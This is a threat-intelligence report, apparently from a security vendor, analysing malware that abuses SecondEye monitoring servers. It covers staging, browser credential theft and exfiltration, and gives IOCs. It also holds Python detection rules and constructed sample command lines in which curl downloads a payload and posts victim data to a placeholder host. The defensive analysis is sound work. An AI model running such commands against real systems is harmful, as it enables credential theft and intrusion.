2020 was a paradigm-shifting moment for many businesses. While some have reverted, others are continuing onwards with new ways of working. Back in 2019, less than 6% of Americans worked from home. Now, 58% of U.S. adults have the option to work from home at least one day a week, and 86% of them take advantage of it. The problem facing leadership then is, how do you monitor productivity?
The solution comes in the form of monitoring software. Capabilities across these tools include, but are not limited to, screen recording, logging keystrokes, and live screen viewing. Many of these software solutions are marketed to ensure the safety of intellectual property and integrate enterprise-level threat detection.
Nevertheless, the concern then becomes, what happens when an enterprise solution is used maliciously? Unfortunately, these same capabilities are often present in malicious binaries, as well as threat actor playbooks. Take SecondEye for example. Earlier this year, Blackpoint identified and responded to two identical suspicious File Transfer Protocol (FTP) events connected to a server in Iran within a two-month span. This server was determined to belong to SecondEye.
Information surrounding SecondEye is limited—the company domain has been suspended and can be found in the Akamai Blocklist. Therefore, attempting to navigate to the IP address for the Iranian server returns no response. However, the website is still being hosted and can be accessed using a German server. SecondEye markets their system as a staff monitoring or parental control system but does indeed acknowledge that their product can be used for illegal activities, surveillance, or espionage (see Figure 1). Based on a combination of open-source intelligence (OSINT) and analysis, Blackpoint believes SecondEye to be Iranian.
The initial IP in Iran was identified as being owned by SecondEye using Shodan, a website that provides OSINT. A further search using the ‘Resolver name’ showed another server located in Germany (see Figure 2). Examination of port information showed them to both be running an Apache web server and Pure-FTP, but only the German server was hosting the SecondEye website.
The site was created by ‘UltimateSoft Co’, a web and development company in Iran. Upon evaluation, the services offered appear to be remarkably similar to other enterprise monitoring solutions with the level of access dependent on the chosen package (see Figure 3).
This is where the front ends, though. None of these packages are available for purchase. Instead, the user is taken to a login page for SecondEye. Further examination showed only two other links to be active—one to ‘UltimateSoft Co’ and another to an Instagram page that no longer exists (see Figure 4).
Based on analysis performed by Blackpoint, it is not believed that the initial payload utilized in these attacks is part of the SecondEye product. Instead, it looks as though select components of the SecondEye product have been circumvented by the threat actors, along with utilization of the SecondEye infrastructure for data and payload storage. Blackpoint also observed that the threat actors are interchanging the naming prefix between win and sys across their files. For example, sysBus32 and winBus32—however, the structure remains the same.
Blackpoint has identified two binaries of the sysBus32.exe/winBus32.exe executable, which is the initial payload deployed by the threat actors. Each binary will attempt to make an FTP connection to a given server using a hardcoded value. Also contained within these binaries is the username and password for interacting with the servers. These login credentials are neither obfuscated nor encrypted (see Figure 5).
These credentials are formatted into an output string using ‘sprintf’, and that string is then passed to a new function containing ‘CreateProcessA’. This new function is used to launch the .bat files, each of which performs a different behavior on the endpoint (see Figure 6).
Blackpoint has identified six critical files that are part of the threat actor deployment.
The sysInit32.bat/winInit32.bat file is responsible for acquiring the secondary stages of the malicious deployment and placing them into the ‘%LOCALAPPDATA%\Microsoft\WindowsApps\’ directory (see Figure 7).
It should be noted that this file, as well as an instance of curl and 7zip, was found alongside the sysBus32.bat/winBus32.bat executable that was dropped during the initial deployment. As can be seen in Figure 7 above, the batch file is provided with the IP address, username, and password of the FTP server, as well as the password for unpacking the zip file. These are hardcoded values contained within sysBus32.bat/winBus32.bat. The execution of the batch file is then followed by a 90-second sleep to allow for the acquisition, unpacking, and subsequent deletion of the zip file (see Figure 8).
The sysList32.bat is one of the files contained within the second stage zip folder downloaded and unpacked by sysBus32.bat/winBus32.bat. It is used to acquire the sysList32.php file from the FTP server. It will then attempt to find the combination of ‘%COMPUTERNAME%_%USERNAME%’ within the file.
No image of this file will be provided, as during the investigation, the instance of sysList.php contained clearly compromised devices and usernames. What is worth noting however, is that based on analysis, all devices and usernames were Iranian.
The send_params.bat file is responsible for updating the FTP server with the latest victim information. While the server is still at the same IP address, the username and password used for the upload are different. However, again, these three values are hardcoded and in plain text within the sysBus32.exe/winBus32.exe file. These parameters are passed through to the send_params.bat file along with the Globally Unique Identifier (GUID) and device name of the victim machine. This data is then sent to the FTP server as a POST request using curl.exe (see Figure 9). One interesting parameter within the data sent is the hardcoded ‘is_rat=true’ statement. This would suggest that the device is a viable backdoor into the network.
This file uses netstat to determine if a connection has been opened to the SecondEye server on port 993 (see Figure 10).
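The command-line behaviors described above (FTP credentials passed to curl, a password-protected archive unpacked with 7zip, the ‘is_rat=true’ POST, and the netstat check for port 993) can be hunted in process-creation telemetry. The following is an added example, not code from Blackpoint or from the analyzed samples; the regex shapes, the `ev` helper, and every sample record are constructed assumptions, since the report does not publish the exact command lines.

```python
import re

# Patterns for behaviours described in the report. curl -u/--user/-d, 7-Zip
# "x ... -p" and netstat are real tool options; the actors' exact command
# lines are not published, so the shapes matched here are assumptions.
RULES = {
    "curl_ftp_inline_creds": re.compile(
        r"\bcurl(?:\.exe)?\b.*(?:ftp://[^\s/@]+:[^\s/@]+@"
        r"|(?:-u|--user)\s+\S+:\S+.*ftp://)", re.I),
    "curl_post_is_rat": re.compile(r"\bcurl(?:\.exe)?\b.*\bis_rat=true\b", re.I),
    "netstat_port_993": re.compile(r"\bnetstat\b.*:993\b", re.I),
    "7zip_password_extract": re.compile(
        r"\b7z[a-z]?(?:\.exe)?\s+x\b.*\s-p\S+", re.I),
}
# Initial payload name with either prefix, seen as the parent of a new process.
DROPPER = re.compile(r"(?:^|\\)(?:sys|win)Bus32\.exe$", re.I)


def triage(event):
    """Return the sorted rule names hit by one process-creation record."""
    cmd = event.get("CommandLine", "")
    hits = {name for name, rx in RULES.items() if rx.search(cmd)}
    if DROPPER.search(event.get("ParentImage", "")):
        hits.add("parent_is_bus32_dropper")
    return sorted(hits)


def ev(parent, cmd):
    """Hypothetical helper: build a record with Sysmon Event ID 1 field names."""
    return {"ParentImage": parent, "CommandLine": cmd}


# Constructed records. 192.0.2.10 is a documentation address; user names,
# passwords, paths and URLs are placeholders, not values from the report.
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ev(r"C:\Users\a\Downloads\winBus32.exe",
       "cmd.exe /c winInit32.bat 192.0.2.10 FTPUSER FTPPASS ZIPPASS"),
    ev(CMD, "curl.exe -u FTPUSER:FTPPASS ftp://192.0.2.10/stage2.zip -o stage2.zip"),
    ev(CMD, "7za.exe x stage2.zip -pZIPPASS -y"),
    ev(CMD, 'cmd.exe /c netstat -an | find ":993"'),
    ev(CMD, 'curl.exe -d "guid=CONSTRUCTED&device=HOST01&is_rat=true" http://192.0.2.10/p'),
    ev(r"C:\Windows\explorer.exe", "curl.exe https://example.com/tool.zip -o tool.zip"),
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(triage(e), "<-", e["CommandLine"])
```

The last record is a benign curl download and produces no hits, which is the baseline to tune against before alerting on any single rule.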
The sysUp32.bat file is one of the few that Blackpoint has not identified a winUp32.bat version for. This file is quite different than the sysUpdt32.bat file, which can also be found on the device that pulls the sysUpdt32.php file. The sysUp32.bat is responsible for harvesting the credentials from different browsers, placing them into a zip file, and transferring them to the FTP server under a dedicated folder based on the Computer Name and Username (see Figure 11). For Mozilla Firefox, the threat actors ensure that they handle both the old and new deployment instances. For Google Chrome, the threat actors invoke libchrome.exe, which is a file native to SecondEye.
Of the observed scripts mentioned above, only sysInit32.bat/winInit32.bat, sysList32.bat, and sysUp32.bat were observed being attempted by the threat actors and, apart from sysInit32.bat/winInit32.bat, Blackpoint has seen no evidence to suggest these files are part of the core SecondEye capabilities. Based on our research, the only core capability utilized by the threat actors is libchrome.exe, which is used to harvest Google Chrome credentials. Beyond this, the only other main feature utilized is the SecondEye servers themselves. It is presently not possible to determine what specific credentials the threat actors were after, but Blackpoint will continue to monitor for events.
That said, Iran has a history of dealing with cryptocurrencies. In early 2021, an Iranian software company was linked to the MrbMiner cryptojacking campaign. At the end of 2021, Iran placed a ban on the mining of cryptocurrency without special licenses. Then, in 2022, Blackpoint identified Iranian crypto ransomware unsuccessfully attempting to target some of its customers. Most recently, Iran made a $10 million import order using cryptocurrency to bypass U.S. sanctions, given the reliance on cryptocurrency for the economic wellbeing of the country. Therefore, it is possible that this software is being used to identify and monitor Iranian nationals, for either theft, or more alarmingly, to ensure they comply with selling their currencies to the central bank of Iran.
While the use of any corporate monitoring software is accepted, at its heart it operates no differently from malware. Companies, as seen with SecondEye, will absolve themselves of responsibility by stating that it’s the end user’s responsibility to use the software appropriately. Other companies even offer free trials with only a valid email required for verification. With all this in mind, security companies now need to keep an eye out for illegal malware and, more worryingly, legal malware.
Indicators of Compromise
|22.214.171.124||Iranian SecondEye Server||08/16/22|
|126.96.36.199||German SecondEye Server||08/16/22|
SHA256 sysBus and winBus
Sha256 | 860828F1F1CBFFFDE5211788028C006C2BD758DC9DFDC2811E75262DDBC57C74
- File Name: sysBus32.exe
- File Type: Executable
- File Size: 12.0KB
Sha256 | 8A655FE18CAA93DE64D6CA6657D6009AEF7C0F8E6D6BF7074E4446451165F607
- File Name: winBus32.exe
- File Type: Executable
- File Size: 12.50KB
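Because the threat actors swap the win and sys prefixes while keeping the rest of each file name, name-based matching should key on the stem rather than on a fixed list. The following is an added example, not Blackpoint's tooling: it checks a file record against the file names mentioned in this report and the two SHA-256 values above. The `classify` function, its reason labels, and the sample paths in the comments are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath

# SHA-256 values listed in this report's Indicators of Compromise section.
KNOWN_SHA256 = {
    "860828F1F1CBFFFDE5211788028C006C2BD758DC9DFDC2811E75262DDBC57C74",  # sysBus32.exe
    "8A655FE18CAA93DE64D6CA6657D6009AEF7C0F8E6D6BF7074E4446451165F607",  # winBus32.exe
}
# File stems named in the report. The actors swap the sys/win prefix, so the
# prefix is an alternation and the stem is what identifies the component.
PREFIXED = re.compile(
    r"^(?:sys|win)(Bus32\.exe|Init32\.bat|List32\.(?:bat|php)"
    r"|Up32\.bat|Updt32\.(?:bat|php))$", re.I)
FIXED = {"send_params.bat", "libchrome.exe"}
# %LOCALAPPDATA%\Microsoft\WindowsApps\ once expanded under a user profile.
STAGING = r"\appdata\local\microsoft\windowsapps"


def classify(path, sha256=None):
    """Return the reasons a file record matches artifacts from the report."""
    p = PureWindowsPath(path)
    reasons = []
    if sha256 and sha256.upper() in KNOWN_SHA256:
        reasons.append("sha256")
    m = PREFIXED.match(p.name)
    if m:
        reasons.append("name:" + m.group(1).lower())
    elif p.name.lower() in FIXED:
        reasons.append("name:" + p.name.lower())
    # WindowsApps also holds legitimate files, so the directory only adds
    # weight to a name or hash hit and never fires on its own.
    if reasons and STAGING in str(p.parent).lower():
        reasons.append("staging-dir")
    return reasons


if __name__ == "__main__":
    # Constructed path: a second-stage script in the staging directory.
    print(classify(r"C:\Users\bob\AppData\Local\Microsoft\WindowsApps\winInit32.bat"))
    # Constructed path: a legitimate file in the same directory is ignored.
    print(classify(r"C:\Users\bob\AppData\Local\Microsoft\WindowsApps\python.exe"))
```

A hash hit is reported even when the file has been renamed, and a name hit is reported for either prefix regardless of letter case.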
Tactics, Techniques, and Procedures
|MITRE Technique||MITRE Tactic||Description|